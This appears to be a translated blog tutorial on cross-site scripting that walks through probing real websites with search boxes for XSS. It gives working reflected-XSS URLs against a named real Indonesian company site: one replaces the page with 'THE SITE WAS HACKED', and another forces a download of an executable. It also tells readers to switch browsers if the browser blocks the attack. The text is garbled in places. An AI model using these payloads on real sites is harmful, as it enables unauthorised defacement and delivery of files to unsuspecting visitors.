1 What is XSS?

Cross-site Scripting, fully known as the Cross-site Scripting, takes advantage of the security vulnerabilities of website programs and injects code into the web code. As a result, the malicious code can be executed automatically or unintentionally during loading. After the attack is successful, the attacker may have higher permissions, private information, cookies, and other contents.

Can be divided into:

  • Standed-type: the attacker directly injects the code into the server, which stores the code in the database without filtering and accepts the malicious code as soon as the user opens a web page.
  • Non-persistent: An attacker constructs a URL with malicious code to induce the user to click on it. The server reads the parameters, unfiltered, and then concatenates them into HTML for the browser to execute.

2 Actual Combat Process

2.1 Find websites with XSS vulnerability

Look for websites with a search box,pencarian, which means “search” in Indonesian



2.2 Test one by one to find attacking websites

We take the first website to TEST, the search box input <h1>TEST</h1>, if the attack can be, the following webpage appears



On behalf of the server parameters are not filtered, directly spelled into the HTML, can be further confirmed, right mouse, view the web source code



If < H1 >TEST></h1> is displayed, no filtering is performed on the server

Next, return to the search box and type <script>alert(‘x’); </script>, if it can be attacked, the following page appears




2.3 EXECUTING SCRIPTS for URL Injection Code (Practice 1)

Change the url for

https://www.sankelux.co.id/search?keyword=<script>document.body.innerHTML="
      

       
THE SITE WAS HACKED

      
"</script>
Copy the code

That is, the keyword argument is written as a script, which executes as follows



2.4 URL Injection Code Execution Scripts (Practice 2)

Change the url for

https://www.sankelux.co.id/search?keyword=<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; </script>Copy the code

The putty.exe file is automatically downloaded.

You can replace the keyword with any script you want to execute

2.5 Possible Problems

Browser interception. If the following occurs, replace the browser